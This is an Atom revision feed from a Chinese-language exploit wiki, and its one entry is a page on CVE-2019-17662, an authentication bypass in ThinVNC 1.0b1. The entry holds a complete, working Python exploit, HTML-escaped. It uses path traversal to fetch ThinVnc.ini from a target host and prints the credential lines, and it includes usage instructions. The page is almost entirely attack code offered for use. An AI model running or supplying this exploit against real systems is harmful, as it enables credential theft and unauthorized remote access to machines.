<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-17662_ThinVNC_1.0b1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-17662 ThinVNC 1.0b1 身份驗證繞過漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-17662_ThinVNC_1.0b1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-17662_ThinVNC_1.0b1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-07T06:33:30Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-17662_ThinVNC_1.0b1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1682&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass # Date: 2019-10-17 # Exploit Author: Nikhith Tumamlapalli # Contributor WarMarX # Vendor Homepage: https:/...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-17662_ThinVNC_1.0b1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1682&amp;oldid=prev"/>
		<updated>2021-04-15T06:42:07Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass # Date: 2019-10-17 # Exploit Author: Nikhith Tumamlapalli # Contributor WarMarX # Vendor Homepage: https:/...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass&lt;br /&gt;
# Date: 2019-10-17&lt;br /&gt;
# Exploit Author: Nikhith Tumamlapalli&lt;br /&gt;
# Contributor WarMarX&lt;br /&gt;
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download&lt;br /&gt;
# Version: 1.0b1&lt;br /&gt;
# Tested on: Windows All Platforms&lt;br /&gt;
# CVE : CVE-2019-17662&lt;br /&gt;
&lt;br /&gt;
# Description:&lt;br /&gt;
# Authentication Bypass via Arbitrary File Read&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
&lt;br /&gt;
import sys&lt;br /&gt;
import os&lt;br /&gt;
import requests&lt;br /&gt;
&lt;br /&gt;
def exploit(host,port):&lt;br /&gt;
    url = &amp;quot;http://&amp;quot; + host +&amp;quot;:&amp;quot;+port+&amp;quot;/xyz/../../ThinVnc.ini&amp;quot;&lt;br /&gt;
    r = requests.get(url)&lt;br /&gt;
    body = r.text&lt;br /&gt;
    print(body.splitlines()[2])&lt;br /&gt;
    print(body.splitlines()[3])&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def main():&lt;br /&gt;
    if(len(sys.argv)!=3):&lt;br /&gt;
        print(&amp;quot;Usage:\n{} &amp;lt;host&amp;gt; &amp;lt;port&amp;gt;\n&amp;quot;.format(sys.argv[0]))&lt;br /&gt;
        print(&amp;quot;Example:\n{} 192.168.0.10 5888&amp;quot;)&lt;br /&gt;
    else:&lt;br /&gt;
        port = sys.argv[2]&lt;br /&gt;
        host = sys.argv[1]&lt;br /&gt;
        exploit(host,port)&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    main()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>